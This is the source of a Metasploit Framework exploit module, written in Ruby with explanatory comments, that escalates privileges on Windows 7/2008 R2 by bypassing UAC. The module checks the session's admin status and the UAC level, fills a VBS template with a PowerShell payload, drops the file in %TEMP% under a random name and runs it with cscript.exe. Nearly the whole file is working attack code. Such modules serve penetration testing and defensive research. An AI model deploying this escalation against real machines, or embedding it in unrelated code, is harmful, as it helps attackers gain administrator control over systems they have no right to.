GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/bypassuac_vbs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege-escalation module (UAC bypass via the script host
# binaries). Flow, as visible in this file: environment and permission
# checks, a branch on the configured UAC level, then a VBS template from the
# framework's data directory is filled with a PowerShell payload command,
# dropped under %TEMP% with a random name, and executed via cscript.exe.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::FileDropper
  include Exploit::Powershell
  include Post::File
  include Post::Windows::Priv
  include Post::Windows::Runas

  # Module metadata (name, authors, platform, targets, references,
  # disclosure date) merged into the framework's module info.
  #
  # @param info [Hash] metadata supplied by the framework and extended here
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',
        'Description' => %q{
          This module will bypass Windows UAC by utilizing the missing .manifest on the script host
          cscript/wscript.exe binaries.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Vozzie',
          'Ben Campbell'
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          ['URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html'],
          ['URL', 'https://github.com/Vozzie/uacscript']
        ],
        'DisclosureDate' => '2015-08-22'
      )
    )
  end

  # Entry point invoked by the framework.
  #
  # Order of operations: validate_environment! and check_permissions!
  # (both abort via fail_with), one get_envs lookup for TEMP and WINDIR,
  # a case on get_uac_level, then upload_vbs and a cmd_exec of
  # `cscript.exe //B <path>`.
  #
  # Defender-relevant artefacts produced by this path: a .vbs with an
  # 8-character alphabetic name in the session user's TEMP directory
  # (registered for cleanup in upload_vbs) and a cscript.exe process
  # started with the //B switch reading that file.
  def exploit
    # Validate that we can actually do things before we bother
    # doing any more work
    validate_environment!
    check_permissions!

    # get all required environment variables in one shot instead. This
    # is a better approach because we don't constantly make calls through
    # the session to get the variables.
    # NOTE(review): WINDIR is fetched here but not read anywhere else in
    # this class; only TEMP is used below.
    env_vars = get_envs('TEMP', 'WINDIR')

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      # "Always Notify" style levels are out of scope for this module.
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      # No prompt configured: hand off to the Runas mixin and skip the
      # VBS drop entirely.
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # Random 8-letter name under the session's TEMP directory.
    vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"

    upload_vbs(vbs_filepath)

    # //B = batch mode; the path is interpolated unquoted.
    cmd_exec("cscript.exe //B #{vbs_filepath}")
  end

  # Aborts unless the session looks able to elevate.
  #
  # is_in_admin_group? returning nil is treated as "unknown" and only
  # reported; false is fatal (Failure::NoAccess). A low integrity level
  # (INTEGRITY_LEVEL_SID[:low]) is also fatal.
  #
  # @raise via fail_with(Failure::NoAccess) when a check fails
  def check_permissions!
    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    if admin_group.nil?
      # nil means the group lookup itself failed, not that the user is
      # outside the group, so execution continues.
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    elsif admin_group
      print_good('Part of Administrators group! Continuing...')
    else
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end

  # Builds the VBS from the bundled template and writes it to the target.
  #
  # Reads <data_directory>/exploits/scripthost_uac_bypass/bypass.vbs,
  # replaces the literal COMMAND token with the PowerShell payload command
  # produced by cmd_psh_payload (remove_comspec: true), writes the result
  # to payload_filepath and registers that path with FileDropper so it is
  # removed during cleanup.
  #
  # @param payload_filepath [String] remote path the .vbs is written to
  # @raise via fail_with(Failure::Unknown) if the Meterpreter write fails
  def upload_vbs(payload_filepath)
    vbs = File.read(File.join(Msf::Config.data_directory,
                              'exploits',
                              'scripthost_uac_bypass',
                              'bypass.vbs'))

    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)

    # In-place substitution of the template placeholder.
    vbs.gsub!('COMMAND', command)
    print_status('Uploading the Payload VBS to the filesystem...')
    begin
      vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")
      write_file(payload_filepath, vbs)
      register_file_for_cleanup(payload_filepath)
    rescue Rex::Post::Meterpreter::RequestError => e
      # Only Meterpreter transport errors are mapped to a module failure here.
      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")
    end
  end

  # Aborts early when the module cannot or need not run.
  #
  # Fails with Failure::None when already admin or SYSTEM, with
  # Failure::NotVulnerable unless get_version_info reports
  # win7_or_2008r2?, and, when UAC is disabled, with Failure::NoAccess
  # unless the user is in the Administrators group.
  #
  # NOTE(review): check_permissions! repeats the is_in_admin_group? check
  # with different handling of a nil result.
  def validate_environment!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    version = get_version_info
    if version.win7_or_2008r2?
      print_good("#{version.product_name} may be vulnerable.")
    else
      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
    end

    if is_uac_enabled?
      print_status('UAC is Enabled, checking level...')
    else
      # UAC disabled: Administrators group membership is still required.
      unless is_in_admin_group?
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end
  end
end